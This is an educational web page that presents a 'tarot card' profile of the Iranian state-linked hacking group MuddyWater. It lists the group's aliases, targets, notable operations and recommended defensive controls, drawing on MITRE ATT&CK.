Threat Intelligence Tarot
swords · 14
Iran (MOIS - Ministry of Intelligence)
G0069★★★★★
risk 3/5
✦ The Marsh ✦
MuddyWater
SeedWorm · TEMP.Zagros · Mercury · Mango Sandstorm · TA450
TurkeyPakistanIraqIsraelSaudi ArabiaTelecomGovernment
Active since ~2017 · Middle East political intelligence, Espionage against Iran opponents, Regional government access
The Marsh does not operate alone - it is the Ministry of Intelligence's instrument across the Middle East, watching Turkey, threatening Israel, monitoring opposition. It moves through the region's political terrain like water through soft ground, taking the shape of whatever crack it finds.
Tactics & Techniques
RCN
RDV
INI
EXC
PRS
PRV
EVA
CRD
DSC
LAT
COL
C2
EXF
IMP
Notable Operations
- ◆CISA advisory on Iran MOIS operations (2022)
- ◆Turkey government targeting via malicious Office documents
- ◆Israeli and Saudi telecommunications targeting
- ◆SimpleHelp and Atera remote access tool abuse
Defenses
- ▸PowerShell logging, AMSI, and constrained language modeCIS Control 8 ↗
- ▸Remote monitoring and management tool allowlistingCIS Control 2 ↗
- ▸Email attachment sandboxing with Middle East language supportCIS Control 9 ↗
- ▸CISA Iran threat advisory monitoring and indicator integrationNIST CSF: DE.AE ↗
Reversed: Their Weakness
MuddyWater's broad geographic mandate and multiple concurrent campaigns created coordination challenges - its overlapping infrastructure and tool reuse across different regional targets helped researchers map the full scope of MOIS cyber operations.
Share this adversary profile
swipe to browse
Related Adversaries
Data sourced from MITRE ATT&CK. For educational purposes.